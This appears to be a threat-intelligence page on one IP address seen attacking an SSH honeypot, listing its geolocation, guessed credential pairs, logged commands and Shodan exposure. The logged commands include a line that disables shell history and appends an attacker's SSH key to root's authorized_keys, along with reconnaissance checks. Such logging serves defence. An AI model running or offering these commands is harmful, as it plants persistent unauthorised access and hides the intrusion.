Active Threat β’ MEDIUM
23.137.255.42
π―
100
Total Attacks
π
1
Ports
π‘
1
Attack Types
π¦
4
Malware
Geolocation
- Country
- πΊπΈ United States
- City
- Liberty Lake
- ASN
- AS40663
- ISP
- IncogNet LLC
Attack Types
ssh_telnet_honeypot
Attacked Ports
22
Associated Malware
Attempted Credentials
πroot/root
1xπ%company%/password@1234
1xπminoxidil4you/Minoxidil4you!123
1xπ%company%/user1234!
1xπroot/minoxidil4you2022
1xπroot/Minoxidil4you$$$
1xπroot/minoxidil4you.2015
1xπminoxidil4you/minoxidil4you@#@!
1xπroot/minoxidil4you#2016
1xπminoxidil4you/Minoxidil4you.2016
1xπroot/@minoxidil4you@2021
1xπminoxidil4you/Minoxidil4you_2023
1xπroot/minoxidil4you@20222022
1xπminoxidil4you/minoxidil4you!@2022
1xπroot/test12345678^
1xExecuted Commands
$
uname -a3x$
export HOME=/dev/null;export HISTFILE=/dev/null;chattr -isa /root/.ssh/authorized_keys;echo 'ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQCYteFBiVVKhUucH8Jjuzlh9pNriiQJFagSbuI1FN5czogKvtyc/ayDvt2T7w5UMuo1kIYefBQRKc661934f6dd2a58NAIs7ehhoG56IVFPUdooUza00ziduX/8vgd29UmSZk8Y+7bAh0cP43C3N0/M6RlV8Qy2onqrF02RbeTu9tzhuBBJA//7ZHzoL/0dbGhwrGOrxSmqPnNO4VL/W8gOHYyDRSLPfUpTJNsP9AulmmQeaYXcQOZ4pFzMpiGZwSXJYw9xcrz7PMmMAcCOYbAWJYz9LT980nY3XgQb9QSKDoGuRlqm5HPdY2bipGgFwgwNGG0V4bQLCUMKudkq6oWL rsa-key-20250409' >>/root/2x$
ls -la /home/ 2>/dev/null | grep -q phil && echo 'phil_found' || echo 'ok'1xShodan InternetDB ExposureShodan
InternetDB data, not real-time
Ports
2280123300060016002800010443
Hostnames
static.23-137-255-42.isp.st
CPEs
cpe:/a:f5:nginxcpe:/o:debian:debian_linuxcpe:/a:ntp:ntp:3cpe:/a:openbsd:openssh:9.2p1cpe:/a:golang:gocpe:/o:linux:linux_kernelcpe:/a:caddyserver:caddy
Risk Assessment
50
/100
LowMediumHighCritical